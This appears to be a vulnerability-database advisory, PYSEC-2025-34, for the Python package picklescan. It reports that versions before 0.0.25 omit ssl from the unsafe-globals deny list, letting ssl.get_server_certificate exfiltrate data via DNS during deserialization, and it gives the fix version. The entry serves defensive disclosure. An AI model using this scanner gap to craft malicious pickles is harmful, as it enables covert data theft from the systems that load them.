VDB
KO

PYSEC-2025-34

Details

The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / picklescan
Introduced in: 0 Fixed in: 0.0.25
Fix pip install --upgrade 'picklescan>=0.0.25'

References